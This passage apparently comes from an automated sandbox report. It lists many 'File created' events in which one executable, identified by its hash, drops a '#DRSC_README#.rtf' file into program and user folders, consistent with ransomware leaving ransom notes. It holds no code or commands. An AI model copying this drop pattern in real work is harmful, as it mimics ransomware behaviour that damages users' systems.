(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1400429095-533421673-2598934218-1000\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\OneDrive\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Downloads\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\plugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fa\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-BA\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iq5q997v.default-release\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Desktop\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{bcfd4dbd-bc19-4d8e-98f1-3ac5b382f646}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\deploy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\as-IN\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\cmm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 